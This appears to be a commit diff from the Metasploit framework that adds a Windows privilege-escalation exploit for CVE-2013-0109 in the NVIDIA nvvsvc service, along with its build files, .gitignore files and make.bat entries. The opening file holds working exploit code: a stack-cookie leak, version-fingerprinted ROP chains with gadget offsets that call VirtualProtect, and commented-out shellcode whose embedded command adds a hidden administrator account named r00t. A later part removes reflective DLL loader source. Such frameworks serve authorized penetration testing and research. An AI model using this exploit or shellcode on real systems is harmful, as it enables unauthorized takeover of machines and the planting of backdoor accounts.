// "net user r00t r00t00r! /add & net localgroup administrators /add"
// exitfunc=thread
/*char code[] = ""
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64"
"\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30"
"\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64"
"\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72"
"\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74"
"\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";*/
printf("Building exploit ...\n");
unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034);
printf("\t\t => Stack cookie 0&x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie);
memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8);
unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL;
// Perform some limited fingerprinting (my default install version, vs latest at time of testing)
switch (uiRetnAddress & 0xfff)
{
case 0x640: // nvvsvc.exe - 03 Nov 2011 - 1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d
uiBase = uiRetnAddress - 0x4640;
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
// Param 1: lpAddress [r11 (near rsp) into rcx]
pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn
pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
pRopChain[2] = 0; // Padding
pRopChain[3] = 0; // ...
pRopChain[4] = 0; // ...
pRopChain[5] = 0; // ...
pRopChain[6] = 0; // ...
pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
pRopChain[10] = 0; // Padding
pRopChain[11] = 0; // ...
pRopChain[12] = 0; // ...
pRopChain[13] = 0; // ...
pRopChain[14] = 0; // ...
pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn
pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn
// Param 4: lpflOldProtect [r9 - already points at writable location]
pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect
pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn
pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax
pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect)
memcpy(pRopChain + 22, payload, payloadLen);
break;
case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f
uiBase = uiRetnAddress - 0x39f1;
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
// Param 1: lpAddress [r11 (near rsp) into rcx]
pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn
pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
pRopChain[2] = 0; // Padding ...
pRopChain[3] = 0; // ...
pRopChain[4] = 0; // ...
pRopChain[5] = 0; // ...
pRopChain[6] = 0; // ...
pRopChain[7] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
pRopChain[10] = 0; // Padding ...
pRopChain[11] = 0; // ...
pRopChain[12] = 0; // ...
pRopChain[13] = 0; // ...
pRopChain[14] = 0; // ...
// Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
pRopChain[15] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
pRopChain[16] = 0x40; // PAGE_EXECUTE_READWRITE
pRopChain[17] = uiBase + 0x8b92; // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
pRopChain[18] = 0; // Padding ...
pRopChain[19] = 0; // ...
pRopChain[20] = 0; // ...
pRopChain[21] = 0; // ...
pRopChain[22] = 0; // ...
// Param 4: lpflOldProtect [r9 - already points at writable location]
pRopChain[23] = uiBase + 0xd202; // nvvsvc.exe+0xd202: pop rax; retn
pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130
pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn
pRopChain[26] = 0; // Padding ...
pRopChain[27] = 0; // ...
pRopChain[28] = 0; // ...
pRopChain[29] = 0; // ...
pRopChain[30] = 0; // ...
pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax
pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp
memcpy(pRopChain + 33, payload, payloadLen);
break;
case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b
uiBase = uiRetnAddress - 0x3a11;
printf("\t\t => nvvsvc.exe base 0&x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);
pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7 * 8));
// Param 1: lpAddress [r11 (near rsp) into rcx]
pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn
pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
pRopChain[2] = 0; // Padding ...
pRopChain[3] = 0; // ...
pRopChain[4] = 0; // ...
pRopChain[5] = 0; // ...
pRopChain[6] = 0; // ...
pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn
pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)]
pRopChain[9] = 0; // Padding ...
// Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn
pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE
pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
pRopChain[13] = 0; // Padding ...
pRopChain[14] = 0; // ...
pRopChain[15] = 0; // ...
pRopChain[16] = 0; // ...
pRopChain[17] = 0; // ...
// Param 4: lpflOldProtect [r9 - already points at writable location]
pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn
pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128
pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn
pRopChain[21] = 0; // Padding ...
pRopChain[22] = 0; // ...
pRopChain[23] = 0; // ...
pRopChain[24] = 0; // ...
pRopChain[25] = 0; // ...
pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax
pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn
memcpy(pRopChain + 28, payload, payloadLen);
break;
}
break;
}
i++;
}
Cleanup:
if (hPipe)
{
CloseHandle(hPipe);
}
}

6
external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.h vendored Executable file
View File

@ -0,0 +1,6 @@
#ifndef _METASPLOIT_SOURCE_NVIDIA_NVSVC_H
#define _METASPLOIT_SOURCE_NVIDIA_NVSVC_H
VOID elevate_nvidia_nvsvc(LPVOID payload);
#endif

142
external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj vendored Executable file
View File

@ -0,0 +1,142 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{6B3FF768-1F25-49C1-8827-EDEC84D4749F}</ProjectGuid>
<RootNamespace>nvidia_nvsvc</RootNamespace>
<Keyword>Win32Proj</Keyword>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<WholeProgramOptimization>false</WholeProgramOptimization>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<CharacterSet>MultiByte</CharacterSet>
<PlatformToolset>v120</PlatformToolset>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup>
<_ProjectFileVersion>10.0.30319.1</_ProjectFileVersion>
<OutDir>$(Configuration)\$(Platform)\</OutDir>
<IntDir>$(Configuration)\$(Platform)\</IntDir>
<LinkIncremental>false</LinkIncremental>
<GenerateManifest>false</GenerateManifest>
<CodeAnalysisRuleSet>AllRules.ruleset</CodeAnalysisRuleSet>
<CodeAnalysisRules />
<CodeAnalysisRuleAssemblies />
<TargetName>$(ProjectName).$(PlatformShortName)</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<Optimization>Disabled</Optimization>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions)</PreprocessorDefinitions>
<MinimalRebuild>true</MinimalRebuild>
<BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>true</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<TargetMachine>MachineX86</TargetMachine>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
</PostBuildEvent>
<ResourceCompile>
<PreprocessorDefinitions>_DEBUG;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<IntrinsicFunctions>false</IntrinsicFunctions>
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;nvidia_nvsvcessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>false</FunctionLevelLinking>
<PrecompiledHeader>
</PrecompiledHeader>
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
<ObjectFileName>$(OutDir)\</ObjectFileName>
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
</ClCompile>
<Link>
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
<GenerateDebugInformation>false</GenerateDebugInformation>
<GenerateMapFile>true</GenerateMapFile>
<MapFileName>$(OutDir)\nvidia_nvsvc.map</MapFileName>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>
</OptimizeReferences>
<EnableCOMDATFolding>
</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>
</DataExecutionPrevention>
<ImportLibrary>$(OutDir)\nvidia_nvsvc.lib</ImportLibrary>
<TargetMachine>MachineX86</TargetMachine>
<Profile>false</Profile>
<ModuleDefinitionFile>
</ModuleDefinitionFile>
<AdditionalOptions>/ignore:4070</AdditionalOptions>
</Link>
<PostBuildEvent>
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
IF EXIST "..\..\..\..\..\data\exploits\CVE-2013-0109\" GOTO COPY
mkdir "..\..\..\..\..\data\exploits\CVE-2013-0109\"
:COPY
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2013-0109\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="dllmain.c" />
<ClCompile Include="nvidia_nvsvc.cpp" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="nvidia_nvsvc.h" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

10
external/source/exploits/cve-2013-0109/nvidia_nvsvc/nvidia_nvsvc.vcxproj.filters vendored Executable file
View File

@ -0,0 +1,10 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<ClCompile Include="nvidia_nvsvc.cpp" />
<ClCompile Include="dllmain.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="nvidia_nvsvc.h" />
</ItemGroup>
</Project>

152
external/source/exploits/cve-2013-3660/.gitignore vendored Normal file
View File

@ -0,0 +1,152 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store

7
external/source/exploits/make.bat vendored
View File

@ -26,6 +26,13 @@ PUSHD CVE-2010-0232
msbuild.exe make.msbuild /target:%PLAT%
POPD
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-0109 (nvidia_nvsvc)"
PUSHD CVE-2013-0109
msbuild.exe make.msbuild /target:%PLAT%
POPD
)
IF "%ERRORLEVEL%"=="0" (
ECHO "Building CVE-2013-3660 (ppr_flatten_rec)"
PUSHD CVE-2013-3660

152
external/source/vncdll/.gitignore vendored Normal file
View File

@ -0,0 +1,152 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
# User-specific files
*.suo
*.user
*.sln.docstates
# Build results
[Dd]ebug/
[Rr]elease/
x64/
build/
[Bb]in/
[Oo]bj/
# Enable "build/" folder in the NuGet Packages folder since NuGet packages use it for MSBuild targets
!packages/*/build/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
*_i.c
*_p.c
*.ilk
*.meta
*.obj
*.pch
*.pdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.log
*.scc
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opensdf
*.sdf
*.cachefile
# Visual Studio profiler
*.psess
*.vsp
*.vspx
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# NCrunch
*.ncrunch*
.*crunch*.local.xml
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.Publish.xml
*.pubxml
# NuGet Packages Directory
## TODO: If you have NuGet Package Restore enabled, uncomment the next line
#packages/
# Windows Azure Build Output
csx
*.build.csdef
# Windows Store app package directory
AppPackages/
# Others
sql/
*.Cache
ClientBin/
[Ss]tyle[Cc]op.*
~$*
*~
*.dbmdl
*.[Pp]ublish.xml
*.pfx
*.publishsettings
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file to a newer
# Visual Studio version. Backup files are not needed, because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
# SQL Server files
App_Data/*.mdf
App_Data/*.ldf
# =========================
# Windows detritus
# =========================
# Windows image file caches
Thumbs.db
ehthumbs.db
# Folder config file
Desktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Mac crap
.DS_Store

131
external/source/vncdll/loader/LoadLibraryR.c vendored
View File

@ -1,131 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "LoadLibraryR.h"
//===============================================================================================//
DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{
WORD wIndex = 0;
PIMAGE_SECTION_HEADER pSectionHeader = NULL;
PIMAGE_NT_HEADERS pNtHeaders = NULL;
pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
if( dwRva < pSectionHeader[0].PointerToRawData )
return dwRva;
for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
{
if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
}
return 0;
}
//===============================================================================================//
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
{
UINT_PTR uiBaseAddress = 0;
UINT_PTR uiExportDir = 0;
UINT_PTR uiNameArray = 0;
UINT_PTR uiAddressArray = 0;
UINT_PTR uiNameOrdinals = 0;
DWORD dwCounter = 0;
#ifdef _WIN64
DWORD dwMeterpreterArch = 2;
#else
DWORD dwMeterpreterArch = 1;
#endif
uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
// get the File Offset of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// currenlty we can only process a PE file which is the same type as the one this fuction has
// been compiled as, due to various offset in the PE structures being defined at compile time.
if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
{
if( dwMeterpreterArch != 1 )
return 0;
}
else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
{
if( dwMeterpreterArch != 2 )
return 0;
}
else
{
return 0;
}
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the File Offset of the export directory
uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
// get the File Offset for the array of name pointers
uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// get the File Offset for the array of name ordinals
uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
// get a counter for the number of exported functions...
dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
// loop through all the exported functions to find the ReflectiveLoader
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
{
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// use the functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// return the File Offset to the ReflectiveLoader() functions code...
return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
return 0;
}
//===============================================================================================//

37
external/source/vncdll/loader/LoadLibraryR.h vendored
View File

@ -1,37 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
